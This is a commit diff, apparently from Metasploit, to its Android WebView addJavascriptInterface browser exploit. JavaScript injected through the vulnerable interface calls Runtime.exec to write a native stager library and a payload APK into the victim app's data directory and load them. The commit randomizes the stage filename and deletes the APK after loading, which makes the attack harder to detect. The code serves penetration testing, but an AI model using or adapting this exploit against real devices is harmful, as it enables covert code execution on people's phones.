randomize payload filename

modules/exploits/android/browser/webview_addjavascriptinterface.rb

@@ -86,12 +86,14 @@ class Metasploit3 < Msf::Exploit::Remote
     send_response_html(cli, html)
   end
 
-  def dalvikstager
-    localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libdalvikstager.so')
-    File.read(localfile, :mode => 'rb')
+  def ndkstager(stagename)
+    localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libndkstager.so')
+    data = File.read(localfile, :mode => 'rb')
+    data.gsub!('PLOAD', stagename)
   end
 
   def js
+    stagename = Rex::Text.rand_text_alpha(5)
     %Q|
       function exec(obj) {
         // ensure that the object contains a native interface
@@ -101,14 +103,14 @@ class Metasploit3 < Msf::Exploit::Remote
         var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
         var runtime = m.invoke(null, null);
         var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
-        var libraryData = "#{Rex::Text.to_hex(dalvikstager, '\\\\x')}";
+        var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename), '\\\\x')}";
 
         // get the process name, which will give us our data path
         var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
         var ch, path = '/data/data/';
         while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
         var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
-        var stagePath = path + '/stage.apk';
+        var stagePath = path + '/#{stagename}.apk';
 
         // build the library and chmod it
         runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor();
@@ -119,6 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote
         runtime.exec(['chmod', '700', stagePath]).waitFor();
 
         runtime.load(libraryPath);
+        runtime.exec(['rm', stagePath]).waitFor();
 
         return true;
       }